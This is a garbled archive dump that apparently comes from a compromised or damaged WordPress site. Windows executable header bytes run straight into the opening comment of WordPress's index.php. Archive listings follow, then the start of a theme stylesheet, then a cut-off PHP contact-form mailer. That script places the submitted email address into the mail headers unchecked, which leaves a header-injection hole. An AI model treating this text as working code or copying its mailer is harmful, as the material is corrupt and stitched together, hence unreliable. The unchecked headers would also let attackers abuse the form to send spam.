MZ ÿÿ ¸ @ ø º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ ³B´´÷#Úç÷#Úç÷#Úç…¢ßæA#Úç…¢Þæû#Úç…¢Ùæÿ#Úçæ¥'çõ#Úçæ¥Ùæþ#Úçæ¥Þææ#Úçæ¥ßæß#Úç…¢Ûæð#Úç÷#Ûç{#Úçs¥Þæî#Úçs¥Øæö#ÚçRich÷#Úç PE d† ˆñg ð "
* º €Ã @ P
Ê¢Ÿ `Á€„ í P äŸ ` # @
t PÁ À @ Ð .text ¹ º `.rdata j+ Ð , ¾ @ @.data PS ê @ À.pdata # ` $ ø @ @.fptable @ À.rsrc äŸ @ @.reloc t @
¾
/**
* Front to the WordPress application. This file doesn't do anything, but loads
MZ ÿÿ ¸ @ ø º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ ³B´´÷#Úç÷#Úç÷#Úç…¢ßæA#Úç…¢Þæû#Úç…¢Ùæÿ#Úçæ¥'çõ#Úçæ¥Ùæþ#Úçæ¥Þææ#Úçæ¥ßæß#Úç…¢Ûæð#Úç÷#Ûç{#Úçs¥Þæî#Úçs¥Øæö#ÚçRich÷#Úç PE d† ˆñg ð "
* º €Ã @ P
Ê¢Ÿ `Á€„ í P äŸ ` # @
t PÁ À @ Ð .text ¹ º `.rdata j+ Ð , ¾ @ @.data PS ê @ À.pdata # ` $ ø @ @.fptable @ À.rsrc äŸ @ @.reloc t @
¾
/**
* Front to the WordPress application. This file doesn't do anything, but loads
file.txt 0000644 00000000030 15251233407 0006217 0 ustar 00 My Launch Page E-mails:
system_log.php 0000644 00000000000 15251233414 0007430 0 ustar 00 style.css 0000644 00000000543 15251233414 0006420 0 ustar 00 /*
Theme Name: Fleepy Under Construction
Theme URI: http://themes.iki-bir.com/fleepy/blue
Description: Themeforest Theme
Version: HTML (v.2.2)
Author: elemis
Author URI: http://iki-bir.com
Tags: under construction, minimalist, clean, one-page, wordpress, contact form, twitter, countdown
*/
@import "style/css/reset.css";
@import "style/css/layout.css"; contact/contact.php 0000644 00000003535 15251233427 0010355 0 ustar 00 \n";
$headers.= "Reply-to:" . $email . "\n";
$headers .= 'MIME-Version: 1.0' . "\r\n";
$headers = "Content-Type: text/html; charset=utf-8\n".$headers;
// Checks Name Field
if(!$name)
{
$error .= 'Please enter your name.
';
}
// Checks Email Field
if(!$email)
{
$error .= 'Please enter an e-mail address.
';
}
if($email && !ValidateEmail($email))
{
$error .= 'Please enter a valid e-mail address.
';
}
if( $answer <> $verificationanswer)
{
$error .= 'Please enter the Correct verification number.
';
}
// Checks Message (length)
if(!$message || strlen($message) < 5)
{
$error .= "Please enter your message. It should have at least 5 characters.
";
}
if(!$error)
{
$messages="From: $email
";
$messages.="Name: $name
";
$messages.="Email: $email
";
$messages.="Message: $message
";
$mail = mail($to,$subject,$messages,$headers);
if($mail)
{
echo 'OK';
}
}
else
{
echo '